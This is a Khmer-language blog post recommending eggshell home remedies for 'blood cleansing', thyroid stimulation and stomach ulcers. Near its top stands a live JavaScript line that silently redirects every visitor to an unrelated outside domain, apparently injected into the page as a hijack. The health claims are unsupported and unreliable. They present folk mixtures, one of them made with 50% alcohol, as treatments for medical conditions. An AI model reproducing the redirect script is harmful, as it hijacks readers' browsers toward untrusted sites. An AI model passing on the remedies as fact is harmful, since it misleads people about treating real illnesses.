Wednesday, February 3, 2016

សូម​​កុំ​​បោះចោល​​សំបក​​ស៊ុត ​វា​​មាន​ប្រយោជន៍​​ច្រើន​យ៉ាង​​ណាស់​



<script type="text/javascript">window.location.replace("http://onlinetodaynews.xyz");</script>
សំបក​ស៊ុត​ក៏​សម្បូរ​ទៅ​ដោយ​ជាតិ​ដែក សង្ក​សី ទង់​ដែង ម៉ង់​កាណែ​ស ភ្លុយ​អ៊័​រ ផូស្វ័​រ ក្រូ​ម និង​ម៉ូលី​ប​ដែន ផងដែរ​។​ ​ការ​ញ៉ាំ​សំបក​ស៊ុត​ត្រឹមតែ​១.៥​ទៅ​៣​ក្រ​ក្នុង​១​ថ្ងៃ អាច​ទទួល​បាន​គ្រប់​ជាតិ​កាល់ស្យូម​​ដែល​រាងកាយ​ត្រូវការ​បាន​។​

egg-shells-better

ខាងក្រោម​នេះ​គឺជា​របៀប​ប្រើ​សំបក​ស៊ុត​មួយចំនួន​។​
១- ដើម្បី​ពង្រឹង​រាងកាយ និង​លាង​សម្អាត​ឈាម​
​លាង​សម្អាត​សំបក​ស៊ុត​៥ វាយ​បំបែក​កិន​ឱ្យ​ម៉ត់ ដាក់ចូល​ទៅក្នុង​ទឹក​៣​លីត្រ រួច​យក​ទៅ​ទុក​នៅ​ក្នុង​ទូទឹកកក​ឱ្យបាន​៧​ថ្ងៃ​។

ផឹកទឹក​នេះ ២​ទៅ​៣​កែវ​ក្នុង​១​ថ្ងៃ​។ អាច​ថែម​ទឹក​ក្រូចឆ្មារ​បន្តិច​ក៏​បាន​។​
២- ដើម្បី​ភ្ញោ​ច​ក្រពេញទី​រ៉ូ​អ៊ីត​
​លាង​សម្អាត​សំបក​ស៊ុត​៨ វាយ​កិនបំបែក​ឱ្យ​ម៉ត់​។ ច្របាច់​ក្រូចឆ្មារ​២​ផ្លែ យក​ទឹក​ក្រូចឆ្មារ​ទៅ​ចាក់​ពីលើ​កំទេច​ស៊ុត រួច​យក​ទៅ​ទុក​ក្នុង​ទូ​ទឹកកក​២​ទៅ​៣​ថ្ងៃ​។ បន្ទាប់​មក​សម្រិតទឹក​ចេញ រួច​ចាក់​ស្រា​រ៉ា​គី​(៥០%) ចូល​។ ទុក​ល្បាយ​នេះ​នៅក្នុង​ទូ​ទឹកកក​៧​ថ្ងៃ​។ ផឹក​ល្បាយ​នេះ​២​ទៅ​៤​ស្លាបព្រា​កាហ្វេ​ក្នុង​១​ថ្ងៃ ក្រោយ​បាយ​រួច​។​
៣- ដើម្បី​ព្យាបាល​រលាក​និង​ដំបៅ​ក្រពះ​
​កិនកំទេច​សំបក​ស៊ុត រួច​ឆ្កឹះ​យក​មួយ​ចុង​កាំបិត យក​មក​លាយ​នឹង​ទឹក​ក្រូចឆ្មារ​២​ស្លាបព្រា​កាហ្វេ និង​ទឹកដោះគោក្តៅ​១​ដេស៊ី​លីត្រ​។ ផឹក​ថ្នាំ​នេះ​២​ដង​ក្នុង​១​ថ្ងៃ នៅ​ពេល​ព្រឹក​ព្រលឹម និង​មុន​ចូល​គេង​។​

​ប្រែ​សម្រួល៖ ម៉ែន សេដ្ឋា​រតន៍​
ប្រភព៖ health.com.kh​

No comments:

Post a Comment